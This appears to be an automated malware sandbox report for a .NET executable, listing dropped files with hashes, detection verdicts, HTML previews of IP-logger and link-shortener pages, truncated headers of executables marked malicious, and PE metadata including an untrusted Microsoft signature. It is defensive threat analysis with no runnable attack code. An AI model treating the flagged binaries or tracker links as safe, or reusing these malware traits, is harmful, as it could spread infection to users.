                                                                                                                                                                                                                                                            MD5:30B1B56E37A9DBE68B65CD002F85D36D
                                                                                                                                                                                                                                                            SHA1:176F8A38FD3E45B5FF45E4DB000CE6F3FBFA1429
                                                                                                                                                                                                                                                            SHA-256:013905AD9E37F10028A4671291A0A93625CCCF97DB4D7626436F9D7B27CD6C19
                                                                                                                                                                                                                                                            SHA-512:4A871D5340B6B1F096F8093522E8E6C32BE11D730E82BF01CD9EF2F3495B950134B34295524B4CB00981935AB4142151DA0606ED7348026491CFBC0C367E864C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="Llm9550BrFyiyZYo8WnXrIGIjMrygTdhLRy8sNWJ">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.58913170465177
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:QQvbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:5bGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:C38FD6DC0269B3EFE182C55089398423
                                                                                                                                                                                                                                                            SHA1:3A60BFBC898C6225B9FD75077847C0836BD677AF
                                                                                                                                                                                                                                                            SHA-256:46F83A9CC705078187ED5478468A3919DEE2A9D6E9CF72351919975AA293F293
                                                                                                                                                                                                                                                            SHA-512:F32121ECCB90A21ED0DF100546D755D9D73BB1FA9DA79735C33406FB69EB57DC76C49CFF485306E581E1A54F58835AC4E43520FD52F6B57F56845EA96C5E92F1
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="JO3nJ0zkvg8a79VMAihrGwZIViySMeJDj9Dfnlke">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.596757195928014
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:Q1vbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:IbGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:5D75F2DA9A442FAC0B2BD9BFF04E909E
                                                                                                                                                                                                                                                            SHA1:4D186A164734C2DDFBEAD5C91646C4FE3CA76C5C
                                                                                                                                                                                                                                                            SHA-256:B3FA13B612AAA4979A7E36D879F37E673EAB817A39266152EA7930A1826C37EC
                                                                                                                                                                                                                                                            SHA-512:67710938384BFB132781F60B49AC07DF40D85C025D91151930476AF0F91F00554F74BADEE7D1137DF02348226FAE9F00F7DED82DB8A4CEB808C6B4AE700496B0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="TwACNll0R4RSVlFJopOZJncjv1Fy0gqNjFO84q0I">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1878244
                                                                                                                                                                                                                                                            Entropy (8bit):7.926614829163194
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:tIiiK2SE+8PR3K9gVDrtKfeKfgErtpX2cvwgx:qiiK2IWRakDrNfExpGcvwgx
                                                                                                                                                                                                                                                            MD5:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            SHA1:B43B709F8D8A4FA4261B9535D1601860F9715E39
                                                                                                                                                                                                                                                            SHA-256:5BF81D9E8AA02DD01EF83000DF2EDDEFB54D71AA7033773D699D5963D5DE75E4
                                                                                                                                                                                                                                                            SHA-512:BB4807A1887A7DFB65729E740216064FAE2C03684429E51E28801182012B1404CF35378B5714A2799696C6CD68CACB92D8270B93583E755E1474DF0444526DF7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):7446
                                                                                                                                                                                                                                                            Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                                            MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                                            SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                                            SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                                            SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):7446
                                                                                                                                                                                                                                                            Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                                            MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                                            SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                                            SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                                            SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):323584
                                                                                                                                                                                                                                                            Entropy (8bit):6.109731815911019
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:HvEczeu14403Cgega/YYn13VguOBft5QRt15VbvVXbzMbtdu:PEcv144/getAfQZfbNrgzu
                                                                                                                                                                                                                                                            MD5:D9578A8E9EE343BC53B08FD8101F66E9
                                                                                                                                                                                                                                                            SHA1:0D89E46868396DF24B3113D778A9ACDD81ECBE2A
                                                                                                                                                                                                                                                            SHA-256:DB184DF3910B9B55E6F47E316D8F4CE4D9213A2BCA188A53201A57301352AA52
                                                                                                                                                                                                                                                            SHA-512:5D3CB21DCE95B6A9958205F794DB293EF75BB3ED1DCA9ED1ABC2A81D2D4D6CD9891A028FC7F325CF3D7DE91F75CF3D912FEE491947976A76C07E8B7A3EF9C977
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.589697665627802
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:Q8vbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:RbGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:4F2CD595BBAAF3441F16DDEC2A160A17
                                                                                                                                                                                                                                                            SHA1:9582812FA4B03CCF57BF70167A66E14188C00379
                                                                                                                                                                                                                                                            SHA-256:5407ACA1D7782DFBC044E339250AB2F7F3FFD350CF46755C47EE08245D3982AE
                                                                                                                                                                                                                                                            SHA-512:75CE9411C009B0C104109D5C10B7F13266F00689CB4AC3BFB82F83FF68C2BFC594A5FA361E154B34A14AB895F8AEDC74E6B8CFA8B2CB5154CCD178270A124F2C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="bkIgx8Jnc0uMgGltcI99w2HJsgheg67V6NBD530q">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4283768
                                                                                                                                                                                                                                                            Entropy (8bit):7.982051005050529
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:+2m9igBHAN3V/nHEqdH/DzOhde70zTyblbjrAts3H4:+LIvF/H3d7z7Y3UUtoH4
                                                                                                                                                                                                                                                            MD5:54F38AF9A5ADA40065F7B6008661E8A1
                                                                                                                                                                                                                                                            SHA1:6CE570E927D57E05F9FA25A37EAF0FB62CEFAF8A
                                                                                                                                                                                                                                                            SHA-256:AC365E2F49564BA5ABA374317FFB9AC29A20B338DB67DEC02D459C9AB85DE637
                                                                                                                                                                                                                                                            SHA-512:50DB5C233C258C0B99F868C4279CDBAB1FB252B5F87EFB207E865BA14F49ECC415AF329B379982072427120BF72250E434F1A9AD938342F3DFD40C31E84401D4
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E^.q+..q+..q+......q+......q+......q+......q+..q*..q+......q+......q+......q+.Rich.q+.........PE..L...+.Mc.....................\E...................@...................................B.....................................,.@.(....pE..w...........RA.x...............................................................L............................text...t........................... ..`.rdata....@.......@.................@..@.data... .....@..(....@.............@....rsrc....GL..pE..x....@.............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):7446
                                                                                                                                                                                                                                                            Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                                            MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                                            SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                                            SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                                            SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1878244
                                                                                                                                                                                                                                                            Entropy (8bit):7.926614829163194
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:tIiiK2SE+8PR3K9gVDrtKfeKfgErtpX2cvwgx:qiiK2IWRakDrNfExpGcvwgx
                                                                                                                                                                                                                                                            MD5:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            SHA1:B43B709F8D8A4FA4261B9535D1601860F9715E39
                                                                                                                                                                                                                                                            SHA-256:5BF81D9E8AA02DD01EF83000DF2EDDEFB54D71AA7033773D699D5963D5DE75E4
                                                                                                                                                                                                                                                            SHA-512:BB4807A1887A7DFB65729E740216064FAE2C03684429E51E28801182012B1404CF35378B5714A2799696C6CD68CACB92D8270B93583E755E1474DF0444526DF7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|....p...............................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc........p......................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):496
                                                                                                                                                                                                                                                            Entropy (8bit):3.4531872142792017
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:kTXgG5ZsUEZ+lX1t5N6tO8G5ZsUEZ+lX1olKqYEp5txyk+SkE+MTBSclRMlTJzXn:c0Q1oQ1ol62CQ1BZ7MTLwtVVBgB
                                                                                                                                                                                                                                                            MD5:59037F47CF0D1A84F2FD380ED5A810AB
                                                                                                                                                                                                                                                            SHA1:196BEB8F985D8FC7E4D103E766126A839380D2CA
                                                                                                                                                                                                                                                            SHA-256:5ECB88011640D3B228CAFA4385217BADF9E9EE9862EC66EA3B1BCD706D0BBA6B
                                                                                                                                                                                                                                                            SHA-512:3C212502C1ABAEDEC81AB36547498799B3346B29EDBFF0C92A5ED4996BFB64AA5C01FC17FAA72541CC389ABA93AAE750757E7CFBA5BE7F9239B53C8A9E469734
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:....L.}.b.kE...Km..cF.......<... .....s.......... ..................../.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.w.f.p.l.w.f.s...e.x.e.....#.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.....A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...N.W.i.n.d.o.w.s. .F.o.u.n.d.a.t.i.o.n. .S.e.r.v.i.c.e.s.,. .B.a.n. .w.i.l.l. .c.a.u.s.e. .s.y.s.t.e.m. .c.r.a.s.h.,. .p.l.e.a.s.e. .k.e.e.p. .b.o.o.t.i.n.g.................0...............................................
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                                                                                            Entropy (8bit):4.424455290206163
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:hSvfpi6ceLP/9skLmb0OTyWSPHaJG8nAgeMZMMhA2fX4WABlEnN20uhiTw:4vloTyW+EZMM6DFyY03w
                                                                                                                                                                                                                                                            MD5:95D2BDD15C877C953672DFED3AC808B3
                                                                                                                                                                                                                                                            SHA1:D5D8B6856B2AD7CBCF861DA6C1AEE190CA3B7ABC
                                                                                                                                                                                                                                                            SHA-256:B097791DB8A528B21B9ACB31349522C88D3CF00FDA7B939F60A4DDBD9EA62B04
                                                                                                                                                                                                                                                            SHA-512:3589A91F87F5330AC6D8F15728C0D365A9E199332915256009DB7DE3A35047F053C5AD1BE3357C5C1ECB1BF007DDB0B0C6FB92AB4197C59749849CCC1AA77933
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
Preview:regf>...=....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.C."\s
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1744896
                                                                                                                                                                                                                                                            Entropy (8bit):4.577484861512961
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:ASvfpi6ceLP/9skLmb0OTyWSPDaJG8nAgeMZMMhA2fX4WABlEnN20uhiTw:rvloTyWSEZMM6DFyY03w
                                                                                                                                                                                                                                                            MD5:BB3EE5066E43731038C3D26A390B6BE8
                                                                                                                                                                                                                                                            SHA1:8BA3C2ADDB2B3365E8BD7195BD9DC5A4F3FFC463
                                                                                                                                                                                                                                                            SHA-256:2D118B998A02931EBC2AC4DC1CA6A238E7F583537D6910E71C714203E2ADDA62
                                                                                                                                                                                                                                                            SHA-512:B636786C8BC5DD03D4DF35E9D5E4AA93C826432BA6CE55291D08718AB379DF5A8B81CA8D35B300832108639DBAF8BD6F7648979AD08C13A6977B45E3B9920913
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:regf=...=....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.C."\s..................................................................................................................................................................................................................................................................................................................................................HvLE........=............hp....U...q.........0...@...`..hbin.................\.Z............nk,..\.Z........P ..........h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........V...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t.......vk..<...............
                                                                                                                                                                                                                                                            File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                            Entropy (8bit):6.544682159484808
                                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                                            • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                                                                                                                                                                                                            • Win64 Executable GUI (202006/5) 46.43%
                                                                                                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 2.76%
                                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.46%
                                                                                                                                                                                                                                                            File name:dl7WL77rkA.exe
                                                                                                                                                                                                                                                            File size:48'352 bytes
                                                                                                                                                                                                                                                            MD5:f1e075f8cebe5aaca53ed7c158d81cbd
                                                                                                                                                                                                                                                            SHA1:11f80b386b8a04a4f82d065cefb634bb389e9dbd
                                                                                                                                                                                                                                                            SHA256:39245735a6a4d2495cb6a5207bb9d5e2b6c058d113b6b0efc292330a89611757
                                                                                                                                                                                                                                                            SHA512:12b1d894dd8fd2e9c595458a9b4b7098821a642fdc27c6044b84c8c26784ca161957a7b1f934a7253be9737af031bfa15f7436d0776126eec608131924cba192
                                                                                                                                                                                                                                                            SSDEEP:768:7w5fIJQ5UMuXyicwVI7b8kgUUL8L/aUW/seidZhPlqEFiRT:sVp5UMuXy9wowR8tR/lqeip
                                                                                                                                                                                                                                                            TLSH:8F237D21FA5C1227DABF01B98CA150C17B30E34277D1EBA99CD661865AC37C13BB1E5E
                                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....X............"...0.x................ ....@...... ....................................`................................
                                                                                                                                                                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                                            Entrypoint:0x400000
                                                                                                                                                                                                                                                            Entrypoint Section:
                                                                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                            Time Stamp:0xC398581B [Tue Dec 26 19:12:27 2073 UTC]
                                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                                            Import Hash:
                                                                                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                                                                                            Signature Issuer:C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                                                                                                                                                                                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                                                                                            Error Number:-2146762487
Not Before:08/03/2024 02:38:17
Not After:08/03/2025 02:38:17
                                                                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                                                                            • C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                                                                            Thumbprint MD5:6011432F6209C03D1EC27DAD76E9D5E9
                                                                                                                                                                                                                                                            Thumbprint SHA-1:680E4ED67D6A411B916E77D959D2EAC7710427C9
                                                                                                                                                                                                                                                            Thumbprint SHA-256:807B8C02E81DAE7F40506B82C8C95EDCA62AF8AF571C590A760AB09622744C6C
                                                                                                                                                                                                                                                            Serial:2B17B3DF3894BC5540E9E13DA78BBB40
                                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                                            dec ebp
                                                                                                                                                                                                                                                            pop edx
                                                                                                                                                                                                                                                            nop
                                                                                                                                                                                                                                                            add byte ptr [ebx], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax+eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
